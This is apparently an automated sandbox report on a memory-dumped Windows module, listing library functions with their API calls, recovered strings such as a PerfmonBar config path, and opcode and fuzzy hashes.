                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                    • API String ID: 3109751735-1866435925
                                                                                                                                                                                                                    • Opcode ID: 98b426f9327624e46aead96f5595a4d08511ea4ee364a74d62afefbd27b65fb3
                                                                                                                                                                                                                    • Instruction ID: abda5dfe594f2db717f70ef7e892db712cea3533d389aaafe53d811ff7d2672d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98b426f9327624e46aead96f5595a4d08511ea4ee364a74d62afefbd27b65fb3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8611AEF391470D6BC704DE68DC41B96B3ACAF56210F04861BF9549BA80E7B0A9508FA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                    • Opcode ID: 49029b8ba6a8b0f7b7ded6106b056620c99e19ed425b6f1beaa5422843b28bc5
                                                                                                                                                                                                                    • Instruction ID: 4f63abb0061179802136e663e9a7272b7a262409a55fcadb3278595c3b85e61b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49029b8ba6a8b0f7b7ded6106b056620c99e19ed425b6f1beaa5422843b28bc5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEB103B290935E9FDB018F18C890BEEBBE5EF46351F1441AAD944AF281C634E941CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                    • Opcode ID: 330ca96169c62b96118f679b7d6c107cf43dc5ae9dda215046841734e514fa19
                                                                                                                                                                                                                    • Instruction ID: d048a2b9ca56e77b74c3a0a3067c0b670cc6a567e85aa7ae97d56ebd881fea9f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 330ca96169c62b96118f679b7d6c107cf43dc5ae9dda215046841734e514fa19
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F551DD7260E60E9FEB24CF54C950BAA77F4EF08315F10062EDA5547698E731A9A0CF9C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2568140703-0
                                                                                                                                                                                                                    • Opcode ID: 8547db68e969c1c14ea15079d5b5a39e677ef142b1b5176cfbed5acad7ead9ba
                                                                                                                                                                                                                    • Instruction ID: 68c0954d97184751c335be500820dfefaef2de55c37f7b90153251a468d65078
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8547db68e969c1c14ea15079d5b5a39e677ef142b1b5176cfbed5acad7ead9ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B310433A0421A4B9F08DEADE49557ABBE5EF55771710836FEC05CB244EB31E851CA80
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,6F23C658,00000000,00000000,?,?,?,00000004,00000000,00000001,6F23C658,0000007F,?,?), ref: 6F22D638
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6F22D6AD
                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6F22D6BF
                                                                                                                                                                                                                    • __freea.LIBCMT ref: 6F22D6C8
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                                                    • Opcode ID: 3588e868a27c60e24350bc5c0230d400a402fb2d577d50e391620282586c6a9d
                                                                                                                                                                                                                    • Instruction ID: 083b4997e88491a0a7ef42d0fe2d7f3f96bb3f74d784ab9b058b42742cc64162
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3588e868a27c60e24350bc5c0230d400a402fb2d577d50e391620282586c6a9d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60318B72D0021EABDB208F64EC44DFE7BBAFF45721F414269E8189A250DB359961CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,?,6F2355EC,?,00000001,?,00000001,?,6F22DEF4,00000020,00000000,00000001), ref: 6F235F79
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6F2355EC,?,00000001,?,00000001,?,6F22DEF4,00000020,00000000,00000001,00000020,00000001,?,6F22E473,00000008), ref: 6F235F85
                                                                                                                                                                                                                      • Part of subcall function 6F235F4B: CloseHandle.KERNEL32(FFFFFFFE,6F235F95,?,6F2355EC,?,00000001,?,00000001,?,6F22DEF4,00000020,00000000,00000001,00000020,00000001), ref: 6F235F5B
                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 6F235F95
                                                                                                                                                                                                                      • Part of subcall function 6F235F0D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F235F3C,6F2355D2,00000001,?,6F22DEF4,00000020,00000000,00000001,00000020), ref: 6F235F20
                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,6F2355EC,?,00000001,?,00000001,?,6F22DEF4,00000020,00000000,00000001,00000020), ref: 6F235FAA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                    • Opcode ID: 5baef9e8d30cfd0e11f9c0a29bcbe1e67d2b701061afb2fa3fbccc66af5a152c
                                                                                                                                                                                                                    • Instruction ID: 17ced03613f49a62badf4fbc67d8dbbe755e060a323c9bba9795a472ee29c365
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5baef9e8d30cfd0e11f9c0a29bcbe1e67d2b701061afb2fa3fbccc66af5a152c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F0F8B750563ABBCF221EA5CC099893F66EF0A3B1B054010FA0C96560CA328830EFD0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearCopyInit_com_issue_error
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 309108855-0
                                                                                                                                                                                                                    • Opcode ID: fc6bd40d6d4fff496898cb82956c13298d2be5168bfaedc16f88b504efe9cdb2
                                                                                                                                                                                                                    • Instruction ID: fe7d21ed9a6f4f38c432497d0f81aa96ea58151ff845f1623d7acf01bcd3065a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc6bd40d6d4fff496898cb82956c13298d2be5168bfaedc16f88b504efe9cdb2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBD05EB36016286BCF206BA4DC0C8CA7B5EEE076A53000422FB44D2800CFA5CA30CFE8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcspn
                                                                                                                                                                                                                    • String ID: k, o
                                                                                                                                                                                                                    • API String ID: 3709121408-3032303857
                                                                                                                                                                                                                    • Opcode ID: 32e96c80c04f0810266bef62383acbb3d59ca8a031818f364e0c0d725a427408
                                                                                                                                                                                                                    • Instruction ID: a33814a45689d9d5b67755c18cd87474bcdcb460fe851c09cf826b314394d30f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32e96c80c04f0810266bef62383acbb3d59ca8a031818f364e0c0d725a427408
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FE18B72A0024EDFDB04DFA8C894EEEBBB9FF49304F108159E815AB251D735A945CF61
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __floor_pentium4.LIBCMT ref: 6F20BE8D
                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6F20BF4C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • unordered_map/set too long, xrefs: 6F20BF47
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Xinvalid_argument__floor_pentium4std::_
                                                                                                                                                                                                                    • String ID: unordered_map/set too long
                                                                                                                                                                                                                    • API String ID: 3194428529-306623848
                                                                                                                                                                                                                    • Opcode ID: 8940f95f10aabe88de5c6e7705fe0db13cc5947fdf0329d659b670e8e1675451
                                                                                                                                                                                                                    • Instruction ID: acd834b0a8347b0d980406bba973409f6bba594f6a2e6a371cae0d8dbdf41fcb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8940f95f10aabe88de5c6e7705fe0db13cc5947fdf0329d659b670e8e1675451
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F71AE72A047098FCB25DF69C480A9AFBF4FF49314F10866AE455EB641E731A941CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __floor_pentium4.LIBCMT ref: 6F213A02
                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6F213ACB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • unordered_map/set too long, xrefs: 6F213AC6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Xinvalid_argument__floor_pentium4std::_
                                                                                                                                                                                                                    • String ID: unordered_map/set too long
                                                                                                                                                                                                                    • API String ID: 3194428529-306623848
                                                                                                                                                                                                                    • Opcode ID: 032a9448082911c9f402d4bc36f7620345ed635d71a410fb80357c8a3080a952
                                                                                                                                                                                                                    • Instruction ID: 66dbc39f2e1537827db13814a4b8f29e9954c078de2b58a94e5cec7d9e38118b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 032a9448082911c9f402d4bc36f7620345ed635d71a410fb80357c8a3080a952
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48618CB190860E9FCB15CF69C440A9EFBF5FF49314F20836AE415AB240E731A991CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6F20254F
                                                                                                                                                                                                                      • Part of subcall function 6F2182AE: RaiseException.KERNEL32(E06D7363,00000001,00000003,000000FF,00000000,24448D6F,6F2151E0,000000FF,6F24874C,?,000000FF,?,24448D6F), ref: 6F21830E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                                                                                                                    • API String ID: 3109751735-1240500531
                                                                                                                                                                                                                    • Opcode ID: c354e4779ee61dd139bb7da588926c69c389342b39884360c4827324e7977b69
                                                                                                                                                                                                                    • Instruction ID: 2c82cd804dbf3876dc3f14bf30742141b131099a59161a5ea8af8dc3f2fd4b27
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c354e4779ee61dd139bb7da588926c69c389342b39884360c4827324e7977b69
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A41B2B290460DABDB04DF58C840B9EFBB9EF45724F14861AE914A7A80D775A944CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F2047B8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                    • String ID: ; o$; o
                                                                                                                                                                                                                    • API String ID: 118556049-3456712660
                                                                                                                                                                                                                    • Opcode ID: f38fa0c251c411b9baa6317c2a365d215e41aa516aca2220f3682f26de2a732e
                                                                                                                                                                                                                    • Instruction ID: 4cdf83f55d28dcc0fe54b8c9cf57a63ea2a57e55eabda4515932ed2af886ba94
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f38fa0c251c411b9baa6317c2a365d215e41aa516aca2220f3682f26de2a732e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00316A32A0424C9BC318DF7C98D0A6DB7E8FB56215B14832EE966C77D1DB70A5448F52
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22BC81: _free.LIBCMT ref: 6F22BCE1
                                                                                                                                                                                                                      • Part of subcall function 6F22B8FA: GetOEMCP.KERNEL32(00000000,6F22BB81,?,zO"o,6F24D0FC,6F24D0FC,6F224F7A), ref: 6F22B925
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22BBDE
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22BC14
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                    • String ID: zO"o
                                                                                                                                                                                                                    • API String ID: 269201875-616525808
                                                                                                                                                                                                                    • Opcode ID: 3f4bda2b1e5b3ea6d4bf1246eb55b88f7a5a69081b551533bde78aaa12c03e82
                                                                                                                                                                                                                    • Instruction ID: 79d8230fb071a61f3aa26708775d41de541055f688a1163d5b5934e81c118d98
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f4bda2b1e5b3ea6d4bf1246eb55b88f7a5a69081b551533bde78aaa12c03e82
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A31AF7290824EAFCB01DF68C890ADE77F4FF45325F11415AF8249B2A0EB36A950CF61
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: \PerfmonBar\config.xml
                                                                                                                                                                                                                    • API String ID: 0-3729978544
                                                                                                                                                                                                                    • Opcode ID: e447191141ac6d62ad897801b7934486e9173bc444533ccf6e88e7879cb8911e
                                                                                                                                                                                                                    • Instruction ID: dfe7aad8c5f8526546400c6bbdddd47b5a3ec662b5179c30269334dc49d085fd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e447191141ac6d62ad897801b7934486e9173bc444533ccf6e88e7879cb8911e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2318BB2D0164C9FDB20DFA4C948B9EBBF4FF09720F00426AE815A7680DB71A905CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6F233A5A,6F204D84,00000050,?,?,?,?,?), ref: 6F2338DA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                    • API String ID: 0-711371036
                                                                                                                                                                                                                    • Opcode ID: bb718289c436e705bf31877268c6685c07b56bfeb3d60a38de3ebff872b52ccc
                                                                                                                                                                                                                    • Instruction ID: 6a29f249752e6a21e9db93d6a9d9ba6fe29373c694e217c8159565009f137542
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb718289c436e705bf31877268c6685c07b56bfeb3d60a38de3ebff872b52ccc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 112192E3E4412EA6E7148A65C903BC763A6BF44F62B024525E909DB200E733EF44CB90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • InitializeCriticalSectionEx.KERNEL32(00000008,00000000,00000000), ref: 6F21155D
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6F211567
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalErrorInitializeLastSection
                                                                                                                                                                                                                    • String ID: 8S$o
                                                                                                                                                                                                                    • API String ID: 3413597225-1455686356
                                                                                                                                                                                                                    • Opcode ID: ab692cd25c09aea03926d240e9d84d80f87cedce47a7a96d99c58f964abaee6b
                                                                                                                                                                                                                    • Instruction ID: 205a035900692b0385df700fb247c65248629b0b0581aca15a41d7d048ed1bc2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab692cd25c09aea03926d240e9d84d80f87cedce47a7a96d99c58f964abaee6b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20213B72608B1AA7C321CE658844B47BBE9AFE5754F11461EE9598B210DB70D4818FE4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F201FDB
                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F20202A
                                                                                                                                                                                                                      • Part of subcall function 6F2154B2: _Yarn.LIBCPMT ref: 6F2154D1
                                                                                                                                                                                                                      • Part of subcall function 6F2154B2: _Yarn.LIBCPMT ref: 6F2154F5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                    • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                    • Opcode ID: 2fd5e2020dddf03e1e7ca74319f7ec4fe3c9db80b422aa4455661d4e1faf2030
                                                                                                                                                                                                                    • Instruction ID: eabdfeeb3d8c6e3f36bc85f96a0f0f55706cbbcc0e8cdc136fa6421786f126de
